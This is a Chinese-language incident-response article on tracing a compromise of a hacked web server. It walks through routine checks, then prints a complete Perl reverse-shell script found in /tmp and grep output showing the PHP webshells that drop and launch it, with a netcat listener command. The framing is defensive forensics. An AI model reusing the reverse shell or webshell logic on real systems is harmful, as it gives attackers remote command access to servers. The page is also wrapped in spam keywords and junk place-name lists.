91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Web服務器中如何排查病毒

發布時間:2021-11-17 09:56:48 來源:億速云 閱讀:200 作者:小新 欄目:云計算

這篇文章主要介紹Web服務器中如何排查病毒,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!

一服務器疑似被掛馬,現象是從百度搜該站點,出來的結果大部分為×××網站。 

馬上登錄服務器(半夜好困啊)。執行如下的步驟:

<!--[if !supportLists]-->  1、 <!--[endif]-->檢查系統帳號,看有沒有異常帳號--如冒充系統帳號,改一個字母,看起來像系統帳號,混淆視聽。有的家伙狡猾的干活,創建個帳號為“…”極端不易察覺。

<!--[if !supportLists]-->  2、 <!--[endif]-->檢查最近登錄用戶的ip:last 查看9月9號以后到目前的情況,經確認,有一個ip來路不對。

<!--[if !supportLists]-->  3、 <!--[endif]-->檢查系統初始化文件inittab,運行級別為3,為發現異常。一些hacker喜歡在這里下手,加上respawn這樣的行,保證他的程序被殺后自動重啟,不屈不撓地抗爭系統管理員的絞殺。

<!--[if !supportLists]-->  4、 <!--[endif]-->檢查運行級別目錄的腳本,ls –al /etc/rc3.d ,未見異常。

<!--[if !supportLists]-->  5、 <!--[endif]-->檢查自動任務 crontab –l ,root用戶和web運行用戶www各檢查一遍,未見任何異常。

<!--[if !supportLists]-->  6、 <!--[endif]-->檢查歷史記錄history 發現有安裝sendmail的情形,問客戶是否有這個,答:不是自己裝的。

<!--[if !supportLists]-->  7、 <!--[endif]-->檢查web目錄,發現其權限為777,這可讓人不太放心了,心中猜想,可能是從這里下手了。

<!--[if !supportLists]-->  8、 <!--[endif]-->檢查一下目錄/tmp,發現有個文件不太對勁,文件名是spider_bc,打開看一下,是個perl腳本,其內容為:

[root@localhost mysql]#       more /tmp/spider_bc    

#!/usr/bin/perl

use Socket;

$cmd= "lynx";

$system= 'echo "`uname -a`";echo"`id`";/bin/sh';

$0=$cmd;

$target=$ARGV[0];

$port=$ARGV[1];

$iaddr=inet_aton($target) || die("Error: $!\n");

$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");

$proto=getprotobyname('tcp');

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");

connect(SOCKET, $paddr) || die("Error: $!\n");

open(STDIN, ">&SOCKET");

open(STDOUT, ">&SOCKET");

open(STDERR, ">&SOCKET");

system($system);

close(STDIN);

close(STDOUT);

close(STDERR);

   據客戶開發人員反應,這文件刪除以后,一會又自動生成了。

<!--[if !supportLists]-->  9、 <!--[endif]-->初步懷疑是hacker利用web權限設置及程序漏洞上傳了程序后,自動生成這個文件,于是進入到網站根目錄,然后執行grep –r “spider” * ,片刻,結果出來了,下面節錄部分:

[root@localhost www]#       grep spider_bc * -r    

/plusbak/viev.      php:                              echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '創建/tmp/spider_bc成功<br>' : '創建/tmp/spider_bc失敗<br>';

/plusbak/viev.      php:                              echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';

/plusbak/viev.      php:                              echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '創建/tmp/spider_bc.c成功<br>' : '創建/tmp/spider_bc.c失敗<br>';

/plusbak/viev.      php:                              @unlink('/tmp/spider_bc.c');    

/plusbak/viev.      php:                              echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';

/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths.      php:                           echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '創建/tmp/spider_bc成功<br>' : '創建/tmp/spider_bc失敗<br>';

/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths.      php:                           echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';

/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths.      php:                           echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '創建/tmp/spider_bc.c成功<br>' : '創建/tmp/spider_bc.c失敗<br>';

/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths.      php:                           @unlink('/tmp/spider_bc.c');    

/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths.      php:                           echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';

/developers/developers/cache/default/index_sql.      php :                            echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '創建/tmp/spider_bc成功<br>' : '創建/tmp/spider_bc失敗<br>';

/developers/developers/cache/default/index_sql.      php :                            echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';

/developers/developers/cache/default/index_sql.      php :                            echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '創建/tmp/spider_bc.c成功<br>' : '創建/tmp/spider_bc.c失敗<br>';

/developers/developers/cache/default/index_sql.      php :                            @unlink('/tmp/spider_bc.c');    

/developers/developers/cache/default/index_sql.      php :                            echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';

以上是“Web服務器中如何排查病毒”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注億速云行業資訊頻道!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

万盛区| 万安县| 加查县| 松阳县| 顺义区| 齐齐哈尔市| 山东| 时尚| 临泽县| 罗江县| 托克托县| 巴南区| 寿光市| 含山县| 比如县| 滨州市| 区。| 拜泉县| 宣汉县| 安泽县| 白城市| 夏河县| 新源县| 盘山县| 东阳市| 漯河市| 阳新县| 建始县| 石城县| 新巴尔虎左旗| 聂拉木县| 荔波县| 婺源县| 井陉县| 扎囊县| 恩施市| 靖宇县| 油尖旺区| 元江| 淄博市| 岑巩县|